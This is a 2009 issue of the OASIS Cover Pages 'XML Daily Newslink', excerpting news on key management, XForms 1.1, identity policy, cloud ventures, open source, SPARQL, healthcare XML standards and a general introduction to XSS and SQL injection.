The Cover PagesThe OASIS Cover Pages: The Online Resource for Markup Language Technologies
Advanced Search
Site Map
CP RSS Channel
Contact Us
Sponsoring CP
About Our Sponsors

Cover Stories
Articles & Papers
Press Releases

XML Query

XML Applications
General Apps
Government Apps
Academic Apps

Technology and Society
Tech Topics
Related Standards
Last modified: November 03, 2009
XML Daily Newslink. Tuesday, 03 November 2009

A Cover Pages Publication
Provided by OASIS and Sponsor Members
Edited by Robin Cover

This issue of XML Daily Newslink is sponsored by:
Sun Microsystems, Inc.

Call for Proposals: IEEE Key Management Summit 2010 (KMS 2010)
Matt Ball, Conference Announcement

The Key Management Summit 2010 (KMS 2010) program committee has updated the websites for the 2010 IEEE Key Management Summit, which will be held at Lake Tahoe, NV on May 4-5, 2010.

"In 2008, we had the first successful IEEE Key Management Summit, but left with a sense that there is still much work left to do with providing cryptographic key management services that meet the growing needs of data encryption systems. As a follow-on, we've scheduled the 2010 IEEE Key Management Summit to see how we've done and what's still left to do. KMS 2010 is co-located with the IEEE Mass Storage and Systems Technologies conference (MSST) in Lake Tahoe, Nevada...

We are currently seeking speaking proposals. If you would like to propose a topic, please send a description to [the KMS 2010 Cjair]. The deadline for proposal submission is December 31, 2009...

Topics for paper proposale include, but are not limited to: (1) Standards efforts relating to key management; (2) Government policies around key management; (3) Customer case-studies; (4) Panel discussions; (5) Key management technologies—avoid specific vendor references when possible. By signing up for the RSS feed on the blog, you can get updates on the summit as we reach milestones leading up to the event.

The KMS 2010 Chair, as in 2008, is Matt Ball (Sun Microsystems, and Chair, IEEE P1619 Security in Storage Working Group). Program Committee members include also Robert Lockhart (Thales E-Security), Fabio Maino (Cisco Systems), Luther Martin (Voltage Security), Landon Noll (Cisco Systems), Subhash Sankuratripati (NetApp), and Hannes Tschofenig (Nokia Siemens Networks).

See also: the IEEE Key Management Summit 2008

The Key XForms Enhancements in Version 1.1
Kurt Cagle,

XForms 1.0 debuted in 2002 to remarkably little fanfare. After seven years of testing, probing, real-world case studies, and rethinking about the underlying assumptions on which it was based, the W3C recently released XForms 1.1, at a time when people are beginning to seriously examine the potential for the technology. XForms 1.1 has not changed its (apparently unique) underlying structure: an XForms document consists of a model made up of one or more XML instances, along with controls that are bound via XPath to the model. This approach ensures that you can work with the whole model directly in the client, maintain its own internal cohesiveness and validity, and send parts or the entire model to the server as desired.

This article highlights some of the notable new features of XForms 1.1 and introduces some of the early implementations of this latest version. The enhancements in XForms Version 1.1 do exist and are actually quite significant. For the most part, they are areas where the initial specification was either ambiguous or was becoming outdated in the face of evolving web technologies...

For example: (1) Templates: Templates are easily one of the most requested XForms capabilities. In XForms 1.0, when you insert a new XML construct into the model, it has to come from an existing structure in the instance... (2) Enhanced Submission: Submission has been dramatically beefed up to make XForms content submission much more robust, effectively turning it into a first class client. XForms is now capable of supporting a number of new functions, for example, you can now design submissions to work with SOAP, RESTful services, Atom-based services, and even non-XML output, based upon the serialization attribute. This enables tasks such as uploading just the text contents of a given node or using XForms as a blogging platform... An increasing number of open source projects are producing XForms 1.1 implementations, many of which are proving to be surprisingly effective in their space after a couple of years of foundering.

XForms 1.1 is debuting at a time when interest in XML technologies for handling larger-scale projects is rising dramatically. People are beginning to realize that the AJAX revolution by itself is not sufficient to support larger-scale enterprise data-entry solutions, and XForms has been improved considerably in key areas: from more solid support for varying mime-types, to extensibility, to the ability to work with templates and non-XML data. It's the foundation of the new XRX architecture. The combination of XForms on the front end, XQuery on the back end, and REST in the middle makes for a remarkably compelling story that solves many of the issues associated with complex web application design..."

See also: the W3C XForms 1.1 Recommendation

Issues For Responsible User-Centric Identity
Staff, CDT White Paper

"The Center for Democracy and Technology (CDT) has released a whitepaper highlighting policy issues related to responsible user-centric identification systems. The paper comes as the U.S. Government begins launching a series of pilot programs that will use third party user credentials to authenticate users to federal Web sites and discusses possible challenges to be considered as these activities are expanded in order to provide a better user experience...

In order to be trusted by the government pilot, an identity provider must be operating as part of a trust framework approved by the ICAM Trust Framework Adoption Process. Currently, OpenID Foundation, Information Card Foundation, Kantara Initiative, and the InCommon Federation are active in this process. The trust framework provider must ensure that each identity provider that they certify is behaving within the bounds of the trust framework.

If trust framework providers can establish an appropriate set of rules regarding the minimum obligations of identity providers, relying parties and users, there is a large potential to increase the ease with which trust relationships can be formed online. Particularly for single transactions between parties who do not otherwise know each other, UCI systems have the potential to reduce transaction cost and risk. And, indeed, they may even be useful in enabling the formation of more online communities. However, this model can only be successful if privacy and security are adequately protected and risks and liability are allocated in such a way as to enable enforcement and encourage user adoption. The development of trust frameworks for user centric identity provides a unique opportunity to design truly user-centric and privacy protective identity management..."

See also: the CDT announcement

Cisco, EMC Unveil Data Center Joint Venture
Jim Duffy, Network World

Cisco and EMC this week unveiled their anticipated collaboration, which will provide integrated products and services for customers building private cloud computing infrastructures. The partnership, which also includes virtualization software vendor VMware, is set up in two parts: one is a Virtual Computing Environment coalition to develop the new products; the other is a joint venture, called Acadia, to train customers and partners on how to install and use the products [Acadia Private Cloud Solutions,]. Cisco and EMC are lead investors in Acadia, while VMware and Intel are minority investors. Acadia will have its own CEO, which the companies are searching for, and an initial staff of 130. Acadia's main mission will be to accelerate product sales and deployment, perform initial operating and then transfer operations to customers or partners...

The products being developed by the coalition are called Vblock Infrastructure Packages. They are pre-integrated, tested and validated packages combining virtualization, networking, computing, storage, security and management products from the three vendors. There are three Vblocks. Vblock 2 is a high-end configuration supporting up to 3,000 to 6,000 virtual machines targeted at large enterprises and service providers... Vblock 1 is a midsize configuration supporting 800 to 3,000 VMs... Vblock 0 will be an entry-level configuration available in 2010, supporting 300 to 800 VMs, aimed at midsize businesses, small data centers, and for test and development by customers and partners. Vblock 0 is comprised of Cisco's UCS and Nexus 1000v, EMC's Unified Storage and the VMware vSphere platform. Vblock products will be managed by EMC's Ionix Unified Infrastructure Manager and secured by EMC RSA security products..."

See also: the joint announcement

White House Shift to Open Source Draws Mostly Praise
Joab Jackson, Government Computer News

"The U.S. White House's recent deployment of the Drupal open source content management system for its Web site has created a stir among industry observers, who speculate that the move may portend a shift toward more government use of open source, social media and emerging semantic Web technologies.

David Lantner, editor of the ClearType Press blog, noted that Drupal will give the White House a good start in annotating its data in a machine-readable way, if the site's managers choose to do so. Drupal's use of a Resource Description Framework (RDF) "enables authors to add semantic their markup using attributes that are both machine-readable and human-friendly," Lantner wrote. When formatted by RDF, data can then be parsed by other computer programs in a predictable fashion.

A quick look at's source code finds that the pages are formatted to the XHTML-RDFA-1 document type, though no data appears to be formatted in the RDF format yet. XHTML is an HTML Web page markup language that complies to the Extensible Markup Language standard; RDFA is a version of RDF formatted for HTML..."

See also: the DOD guidance document

Microsoft Recommits to $100K Apache Contribution at ApacheCon
Darryl K. Taft, eWEEK

"Microsoft has again committed to its pledge to deliver $100,000 to the Apache Software Foundation over the next couple of years. Microsoft initially announced its plans to commit $100,000 a year to ASF in 2008 at OSCON, the O'Reilly Open Source Convention. This time, the company announced the recommitment of its contribution at the ApacheCon conference in Oakland, California. The ASF is celebrating its Tenth anniversary. Over the past few years, Microsoft has steadily increased its participation with and contribution to the open-source community. For instance, at the recent EclipseCon Europe conference, Microsoft announced plans to make Windows 7 and Windows Server 2008 R2 more available to Eclipse developers...

Justin Erenkrantz (ASF President): 'As you know, last year Microsoft announced its Platinum Sponsorship of the ASF, which it continued this year. While we are delighted to have Microsoft's financial support as a sponsor of the Foundation, I think the more important aspect of Microsoft's relationship is that they are now contributing to a variety of Apache projects. Since we announced the sponsorship last year, Microsoft is now contributing to at least four Apache projects: HBase, Stonehenge, QPid, and POI. This really continues the significant sea change from within the organization — Microsoft now isn't afraid of having their employees contribute to Apache projects on Microsoft's time. Committers from Microsoft sign the same legal agreements that we require from all of our contributors'..."

SPARQL Extension Description
Leigh Dodds (ed), Workshop Presentation

This draft document is based upon a presentation at VoCamp 2009, held at the U.S. Library of Congress just following the 2009 International Semantic Web Conference. The "SPARQL Extension Description" specification defines a vocabulary for describing SPARQL extensions and function libraries. "SPARQL" (SPARQL Protocol and RDF Query Language) is a query language for RDF data on the Semantic Web with formally defined meaning. The extension description vocabulary is intended to support the publishing of descriptive terms at the URIs associated with SPARQL extensions to promote interoperability, validation of SPARQL queries, and general ease of use... An accompanying schema is published on the Wiki.

Problem Statement: "There are many SPARQL extensions available from a variety of different SPARQL implementations. SPARQL 1.0 requires extension functions to have a URI, however none of those URIs typically resolve. It would be useful to publish metadata at those URIs to support interoperability, validation, etc. SPARQL 1.1 includes a Service Description specification which also encourages assignment of URIs to language extensions and entailment regimes, but does not say how to describe those features. By describing functions and extensions, we can support the following use cases: (1) Improve documentation and understanding of SPARQL extensions; (2) Promote interoperability between endpoints by encouraging them to support the same extensions and/or identifying how to map between equivalent extensions; (3) Validate SPARQL queries to determine whether it is using extensions, and whether those extensions are supported by an endpoints.

Dodds: "It looks like the SPARQL Working Group may well be adding a standard library of extension functions into the next revision of the query language so the timing of this work should help contribute to that effort. However I'm looking beyond their immediate goals and hope to encourage the implementor community to explore models simple to the EXSLT effort which has been successful in creating a set of community-designed extensions for XSLT transformations. I see no reason why the same process can't be applied to SPARQL extensions. Clarity of which extensions are portable across triplestores is important to allow users to experiment with various triplestore implementations and services. If data is going to be truly portable, then this will be an important consideration..."

See also: the Wiki for SPARQL Extension Descriptions

Talking to Washington DC About Healthcare XML Standards
Adam Bosworth, Weblog

"I was kindly asked to testify at a meeting in DC this week about standards... the discussion was about what actually will work in terms of making health data liquid. What standards should be used for the integration of such data?...

Somewhat to my surprise and usually to my pain, I've been involved in several successful standards. One was used to exchange data between databases and consumer applications like spreadsheets and Access. It was called ODBC and worked surprisingly well after some initial hiccups. Another was the standard for what today is called AJAX, namely building complex interactive web pages like gmail's. Perhaps most importantly there was XML. These are the successes. There were also some failures. One that stands in my memory is one called OLE DB which was an attempt to supplant/replace ODBC. One that comes close to being a failure was/is the XML Schema specification. From all these efforts, there were a few lessons learned and it is these that I shared with DC. What are they?

[For example:] (1) Keep the standard as simple and stupid as possible. (2) The data being exchanged should be human readable and easy to understand. (3) Standards work best when they are focused. (4) Standards should have precise encodings. (5) Always have real implementations that are actually being used as part of design of any standard. (6) Put in hysteresis for the unexpected: this is something that the net formats do particularly well...assume the unexpected [because] false precision is the graveyard of successful standards. (7) Make the specification itself free, public on the web, and include lots of simple examples on the web site...

A lot of standards are written for purposes other than promoting interoperability. Some exist to protect legacy advantages or to create an opportunity to profit from proprietary intellectual property. Others seem to take on a life of their own and seem to exist solely to justify the continued existence of the standards body itself or to create an opportunity for the authors to collect on juicy consultant fees explaining how the standard is meant to work to the poor saps who have to implement it. I think we can agree that, whatever they are, those are usually not good standards. Health data interoperability is far too important an issue to let fall victim to such an approach..."

See also: XML Standards for Healthcare

Web Application Security: Testing for Vulnerabilities
Jeff Orloff, IBM developerWorks

As the Web grows increasingly social in nature, inversely, it becomes less secure. In fact, the Web Application Security Consortium (WASC) estimated in early 2009 that 87% of all Web sites were vulnerable to attack (see Resources for links to more information). Although some companies can afford to hire outside security analysts to test for exploits, not everyone has the resources to spend US$20,000 to US$40,000 for an outside security audit. Instead, organizations become reliant on their own developers to understand these threats and make sure their code is devoid of any such vulnerability...

XSS results from malicious scripts being injected into a Web site. For instance, Mallory writes a script that sends users to a trusted Web site created by Alice. Mallory inserts this script into a popular forum. When Bob sees this link on the forum, he clicks it and creates an account on Alice's Web site. The script, which has exploited an XSS flaw in Alice's Web site, then sends Bob's cookie to Mallory. Mallory can now impersonate Bob and steal information from him...

SQL injection is the second most popular vulnerability, primarily because of the growing dependence Web sites have on databases. SQL injection is actually quite simple: By finding a Web site that connects to a database, malicious hackers execute an SQL query in a place that the developer never intended for the purpose of bypassing authentication or manipulating data...

To write secure code, you must first understand the threats to which your work is exposed. By knowing what attackers are looking for and addressing these vulnerabilities, you can keep less experienced attackers from being able to breach a site and cause too much trouble for the more organized attacker to bother..."

See also: Application Security Standards


XML Daily Newslink and Cover Pages sponsored by:

IBM Corporation
Microsoft Corporation
Oracle Corporation
Sun Microsystems, Inc.

XML Daily Newslink:
Newsletter Archive:
Newsletter subscribe:
Newsletter unsubscribe:
Newsletter help:
Cover Pages:

Hosted By
OASIS - Organization for the Advancement of Structured Information Standards

Sponsored By

IBM Corporation
ISIS Papyrus
Microsoft Corporation
Oracle Corporation


XML Daily Newslink
Receive daily news updates from Managing Editor, Robin Cover.

 Newsletter Subscription
 Newsletter Archives
Globe Image

Document URI:  —  Legal stuff
Robin Cover, Editor: